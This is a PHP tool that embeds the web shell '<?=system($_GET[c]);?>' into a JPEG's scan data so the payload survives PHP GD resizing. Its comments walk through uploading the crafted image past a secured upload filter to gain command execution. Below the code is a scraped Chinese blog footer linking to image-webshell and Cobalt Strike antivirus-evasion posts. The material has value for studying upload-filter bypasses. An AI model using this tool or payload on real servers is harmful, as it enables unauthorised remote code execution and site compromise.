<?php

	/*

	The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().

	It is necessary that the size and quality of the initial image are the same as those of the processed image.

	1) Upload an arbitrary image via secured files upload script

	2) Save the processed image and launch:

	jpg_payload.php <jpg_name.jpg>

	In case of successful injection you will get a specially crafted image, which should be uploaded again.

	Since the most straightforward injection method is used, the following problems can occur:

	1) After the second processing the injected data may become partially corrupted.

	2) The jpg_payload.php script outputs "Something's wrong".

	If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

	Sergey Bobrov @Black2Fan.

	See also:

	https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

	*/

	$miniPayload = '<?=system($_GET[c]);?>';

	if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {

    	die('php-gd is not installed');

	}

	if(!isset($argv[1])) {

		die('php jpg_payload.php <jpg_name.jpg>');

	}

	set_error_handler("custom_error_handler");

	for($pad = 0; $pad < 1024; $pad++) {

		$nullbytePayloadSize = $pad;

		$dis = new DataInputStream($argv[1]);

		$outStream = file_get_contents($argv[1]);

		$extraBytes = 0;

		$correctImage = TRUE;

		if($dis->readShort() != 0xFFD8) {

			die('Incorrect SOI marker');

		}

		while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {

			$marker = $dis->readByte();

			$size = $dis->readShort() - 2;

			$dis->skip($size);

			if($marker === 0xDA) {

				$startPos = $dis->seek();

				$outStreamTmp =

					substr($outStream, 0, $startPos) .

					$miniPayload .

					str_repeat("\0",$nullbytePayloadSize) .

					substr($outStream, $startPos);

				checkImage('_'.$argv[1], $outStreamTmp, TRUE);

				if($extraBytes !== 0) {

					while((!$dis->eof())) {

						if($dis->readByte() === 0xFF) {

							if($dis->readByte !== 0x00) {

								break;

							}

						}

					}

					$stopPos = $dis->seek() - 2;

					$imageStreamSize = $stopPos - $startPos;

					$outStream =

						substr($outStream, 0, $startPos) .

						$miniPayload .

						substr(

							str_repeat("\0",$nullbytePayloadSize).

								substr($outStream, $startPos, $imageStreamSize),

							0,

							$nullbytePayloadSize+$imageStreamSize-$extraBytes) .

								substr($outStream, $stopPos);

				} elseif($correctImage) {

					$outStream = $outStreamTmp;

				} else {

					break;

				}

				if(checkImage('payload_'.$argv[1], $outStream)) {

					die('Success!');

				} else {

					break;

				}

			}

		}

	}

	unlink('payload_'.$argv[1]);

	die('Something\'s wrong');

	function checkImage($filename, $data, $unlink = FALSE) {

		global $correctImage;

		file_put_contents($filename, $data);

		$correctImage = TRUE;

		imagecreatefromjpeg($filename);

		if($unlink)

			unlink($filename);

		return $correctImage;

	}

	function custom_error_handler($errno, $errstr, $errfile, $errline) {

		global $extraBytes, $correctImage;

		$correctImage = FALSE;

		if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {

			if(isset($m[1])) {

				$extraBytes = (int)$m[1];

			}

		}

	}

	class DataInputStream {

		private $binData;

		private $order;

		private $size;

		public function __construct($filename, $order = false, $fromString = false) {

			$this->binData = '';

			$this->order = $order;

			if(!$fromString) {

				if(!file_exists($filename) || !is_file($filename))

					die('File not exists ['.$filename.']');

				$this->binData = file_get_contents($filename);

			} else {

				$this->binData = $filename;

			}

			$this->size = strlen($this->binData);

		}

		public function seek() {

			return ($this->size - strlen($this->binData));

		}

		public function skip($skip) {

			$this->binData = substr($this->binData, $skip);

		}

		public function readByte() {

			if($this->eof()) {

				die('End Of File');

			}

			$byte = substr($this->binData, 0, 1);

			$this->binData = substr($this->binData, 1);

			return ord($byte);

		}

		public function readShort() {

			if(strlen($this->binData) < 2) {

				die('End Of File');

			}

			$short = substr($this->binData, 0, 2);

			$this->binData = substr($this->binData, 2);

			if($this->order) {

				$short = (ord($short[1]) << 8) + ord($short[0]);

			} else {

				$short = (ord($short[0]) << 8) + ord($short[1]);

			}

			return $short;

		}

		public function eof() {

			return !$this->binData||(strlen($this->binData) === 0);

		}

	}

?>

  

突破GD渲染的图片马的更多相关文章

  1. 突破php的imagecopyresampled 和imagecopyresized 实现图片马JPG

    编辑器加载中...之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算 详见: https://www.ido ...

  2. 利用cmd制作一句话图片马

    先cd进在图片和一句话木马里面的文件夹 假设选择我的图片是:1.jpg 一句话是:2.php 命令:copy 1.jpg/a+2.php/b 生成的图片马

  3. php 简单的学习GD库绘制图片并传回给前端实现方式

    1.基本的GD库绘制图片汇总 2.后台实现小案例 <?php // $img = imagecreatetruecolor(200,40); // var_dump($img); // 利用GD ...

  4. sql注入记录------类型转换错误---convert()函数,一句话图片马制作

    sql注入在联合查询是出现一下错误查不到数据 Illegal mix of collations for operation 'UNION' 用convert() 转换编码为utf8 或者big5 就 ...

  5. php用GD库给图片添加水印

    php用GD库给图片添加文字水印,整个代码比较简单,DEMO如下: <?php /*打开图片*/ //1.配置图片路径 $src = "aeroplane.jpg"; //2 ...

  6. php课程 8-32 如何使用gd库进行图片裁剪和缩放

    php课程 8-32 如何使用gd库进行图片裁剪和缩放 一.总结 一句话总结:图片缩放到图片裁剪就是改变原图截取的位置以及截取的宽高. 1.电商网站那么多的图片,如果全部加载卡得慢的很,所以他们是怎么 ...

  7. 实战OpenGLES--iOS平台使用OpenGLES渲染YUV图片

    上一篇文章 实战FFmpeg--iOS平台使用FFmpeg将视频文件转换为YUV文件 演示了如何将视频文件转换为yuv文件保存,现在要做的是如何将yuv文件利用OpenGLES渲染展示出图像画面.要将 ...

  8. PHP面向对象——GD库实现图片水印和缩略图

    今天的实现目标就是使用GD库完成对图片加水印和图 片缩略图两个功能 动身前逻辑准备 属性: 路径 功能: 构造方法 生成水印的方法 获取 图片信息 获取位置信息(123 456 789) 创建图片资源 ...

  9. [原]零基础学习SDL开发之在Android使用SDL2.0渲染PNG图片

    在上一篇文章我们知道了如何在android使用SDL2.0来渲染显示一张bmp图,但是如果是一张png或者一张jpg的图,那么还能显示成功么?答案是否定的 我们需要移植SDL_image库来支持除bm ...

随机推荐

  1. C# 读取保存xml文件

    直接读取xml文件中的内容 XmlDocument xmlDoc = new XmlDocument(); xmlDoc.LoadXml(result); XmlNode root = xmlDoc. ...

  2. 自旋锁&信号量

    1. 自旋锁 Linux内核中最常见的锁是自旋锁.一个自旋锁就是一个互斥设备,它只能有两个值:"锁定"和"解锁".如果锁可用,则"锁定"位被 ...

  3. io中的特殊流Properties

    对于去年学习IO的时候一些代码贴上来: 初识properties,因为继承自hashtable,其中可以使用put操作: package special; import java.util.Prope ...

  4. 【C语言】第4章 选择结构程序设计

    第4章 选择结构程序设计 C语言有两种选择语句: if 语句,实现两个分支的选择结构 switch 语句,实现多分支的选择结构 输入3个数a,b,c,要求按由小到大的顺序输出. 可以先用伪代码写出算法 ...

  5. Spring Cloud总结

    restTemplate 消费者模块编写restTemplate配置类,即可在控制层调用提供者模块 // 配置类 @Configuration public class ApplicationCont ...

  6. ES6扩展——数组的新方法(Array.from、Array.of、Array.fill、Array.includes、keys values entries 、find)

    1.Array.from(objec,回调函数)将一个ArrayLike对象或者Iterable对象(类数组对象)转换成一个数组 1)该类数组对象必须具有length属性,用于指定数组的长度.如果没有 ...

  7. 谈谈redis缓存击穿透和缓存击穿的区别,雪崩效应

    面试经历 在很长的一段时间里,我以为缓存击穿和缓存穿透是一个东西,直到最近去腾讯面试,面试官问我缓存击穿和穿透的区别:我回答它俩是一样的,面试官马上抬起头用他那细长的单眼皮眼睛瞪着我说:"你 ...

  8. VS Code 1.60 发布!竟然可以自动检测编程语言了!

    北京时间 2021 年 9 月 3 日凌晨,微软正式发布 2021 年 8 月版的 Visual Studio Code.希望您会喜欢此版本中的许多更新与改进,以下是其中的一些亮点: * 自动语言检测 ...

  9. Aggressor Script 开发-Powershell 免杀

    转载https://www.jianshu.com/p/f158a9d6bdcf 前言 在接触到Cobalt Strike的时候就知道有各种插件,想象着那天也可以自己学习编写一个.在之前分析Cobal ...

  10. Redis消息的发布与订阅